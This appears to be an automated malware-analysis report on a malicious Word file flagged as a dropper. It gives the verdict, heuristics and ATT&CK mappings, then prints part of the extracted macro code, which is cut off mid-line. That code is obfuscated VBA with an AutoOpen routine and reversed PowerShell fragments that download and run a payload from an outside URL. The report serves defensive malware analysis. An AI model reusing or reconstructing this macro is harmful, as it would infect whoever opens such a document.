Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands, likely for downloading and running a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6549784-0' further supports its role as a dropper.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6549784-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6549784-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 122560 bytes |

SHA-256: 9d94f732bbf1577f8446fb9a8a0c9a46ea82721501c05da8c14c13a8b4c82257

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "MwJFFsB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub iTdRj(OiTZq)
Set cHZzuu = bPMAc
lDpzQZ = hFaDhs
lLSHzf = INbWRq + Atn(FESSB) + 66231 - 96540 / (94093 * Hex(jCzvw))
jVSCS = 39783 + zEDzv
End Sub
Sub pNbzjr(BIkjKd)
Set mlFwjs = jGDPXi
HNPDnV = LFDQE
VYlms = jcMwEO + Atn(rJHXj) + 22395 - 18177 / (74378 * Hex(vUcWIh))
fCiiXQ = 16448 + RXiCM
Set OKpkdz = iTEuh
dQJVjw = jvWjf
AmFMdH = zjKmmi + Atn(Yzjdjq) + 77674 - 60433 / (9389 * Hex(BBDLO))
nGFCz = 32533 + HbnHcw
Set XjCOd = MtzomV
zKbDOk = Wjhcm
UbCwi = iwkSz + Atn(iiFuGQ) + 29738 - 53784 / (67720 * Hex(zzjsri))
rBacVP = 70966 + DFbmiN
End Sub
Sub cOjFIb(QMKYo)
Set CMqTAP = RZMMPU
DKopA = GXUMm
ISlNRz = GnqPHl + Atn(UaDCT) + 81682 - 75547 / (43912 * Hex(GYVXW))
frdha = 13169 + jLvOoO
Set NujDj = jTSsvn
wiowaE = IwlZLM
trGFCY = ILrRq + Atn(sLYlm) + 75041 - 40875 / (57321 * Hex(Wwojj))
OJHrU = 8460 + cMntOf
End Sub
Sub Autoopen()
On Error Resume Next
Set Tzfjhq = aAnYrP
UIQSsz = CkZWTF
MwsYpp = ZTECpL + Atn(ITScot) + 14900 - 7671 / (42908 * Hex(VhuRMF))
NkNNC = 90942 + BaKuo
wRzpAnWcfS (QClFt + CqpUrItYJi + GtfMb)
Set bRDHu = NOroF
aGYSbN = MPKKSw
XvwUiX = Eadwtj + Atn(hZUbzn) + 59277 - 75447 / (87039 * Hex(RRdOtR))
kLFtR = 30572 + GhMVj
End Sub
Sub Vhhofp(iVIKkC)
Set CRuXL = WMibB
KzVPa = GwSkj
jDbYPC = IPFUon + Atn(KXXJzF) + 75293 - 29101 / (60866 * Hex(NGiBdD))
ShFnIj = 95840 + fjsAEc
Set cmwjaI = dCUXjL
UsfMN = HiABr
MUZuPb = jdwDu + Atn(jhDCTk) + 94621 - 73904 / (77009 * Hex(nNnqa))
tlwsA = 91411 + EHFwT
Set fYplki = EfhRt
YJlhbk = HjKGCb
RwvOod = IlzcD + Atn(FVODf) + 96440 - 25025 / (43711 * Hex(TadLd))
vNjjI = 81015 + FkTcQ
End Sub
Sub PXnFYY(mVHaDO)
Set LfVkc = jNYOsu
CPikC = jGifUF
tlZGJf = YraOiA + Atn(wCzZM) + 57756 - 3322 / (65623 * Hex(rWXWh))
czAio = 12185 + oRENAz
End Sub
Attribute VB_Name = "pPBCRkEj"
Sub IblLO(klIMOP)
Set OELKwO = UwdEXj
UUEzFt = sDCvjF
TEnjuP = zrHmq + Atn(lJzhn) + 65218 - 14033 / (29164 * Hex(EPIWh))
AIPOI = 1081 + tqUdR
End Sub
Function CqpUrItYJi()
On Error Resume Next
Set XdzLP = HiFVHB
SCAYaY = fwirXi
kQHMK = hrnGE + Atn(iZmvnH) + 24928 - 20017 / (65941 * Hex(sRuEkt))
uFnhrX = 35536 + IwlQaP
Set aibzn = ZiYczR
QPzUCC = XGQLV
wtYwfw = zjuzPH + Atn(NXvck) + 56264 - 68943 / (58636 * Hex(VZGpi))
URQbwB = 61020 + Zzzoz
haMYiJvHmIh = VSnrmA("wTT+'ed'+'.ira'+'z'+'an'+'dassa//:p'+'tth '+' GHs'+' = XCD'+'A'+'cSb'+';)331'+'282 ,00001(txen'+'.ds'+'adasnc'+'Sb = BSNcSb'+';tnei'+'lCb'+'TDX", 87960 - 87960 + 4 + 87960 - 87960, 87960 - 87960 + 137 + 87960 - 87960)
Set VAEvwz = KobsE
ZDYYJ = LLcjoI
iMVfk = muwUVL + Atn(jlKdoi) + 88377 - 69883 / (12230 * Hex(AYqul))
tQPnz = 32468 + oIqESX
Set qzJhz = NdPCUC
JLJuz = zritS
jmbsBv = ZzbDM + Atn(AqLOMb) + 16072 - 89005 / (14634 * Hex(smlYYX))
HDqHR = 22985 + kNHOcU
pWLaAff = VSnrmA("hKz))43]rAHc[,)55]rAHc[+65]rAHc[+25]rAHc[(EcALper-69]rAHc[,)611]rAHc[+27]rAHc[+701]rAHc[( EcALper- 29]rAHc[,'23d'eCAlPERc-93]rAHc[,'GHs' EcALCqz", 51324 - 51324 + 4 + 51324 - 51324, 51324 - 51324 + 139 + 51324 - 51324)
Set Izwzfo = VSKfYJ
GQWhCh = AVojf
dwTuS = ujonZt + Atn(olkjbs) + 4743 - 4184 / (58274 * Hex(ljZnOI))
JQAOAW = 98107 + NmOzS
Set jVcntV = tSEiG
zzFqN = MzoiX
nViij = pfSEZX + Atn(ZHMFS) + 69804 - 81156 / (62269 * Hex(vWjNm))
MjvmE = 49795 + ziKjV
ZAnjwtF = VSnrmA("TuB0]03[EmohsP$+]12[eMOHsP$ (. JA,SQ", 56601 - 56601 + 6 + 56601 - 56601, 56601 - 56601 + 27 + 56601 - 56601)
Set aBvYia = IArWwj
aaLBVw = TiInS
THhuiO = FLAww + Atn(zKMsZo) + 46162 - 85389 / (61153 * Hex(TJOYS))
TmlPk = 40833 + Swnjj
Set OLbNQu = qkSKun
nHmwEF = jFrSEL
vjdiWj = AXGQb + Atn(UJikI) + 88850 - 52432 / (89954 * Hex(rrLVH))
FkuLiH = 90602 + pfXGn
cvjzVGSl = VSnrmA("aC'784gN'+'tHkitHkrtSo'+'T784.'+'c'+'fsacSb'+'('+'7'+'84QPP9Q", 53351 - 53351 + 6 + 53351 - 53351, 53351 - 53351 + 54 + 53351 - 53351)
Set kf
```

... (truncated)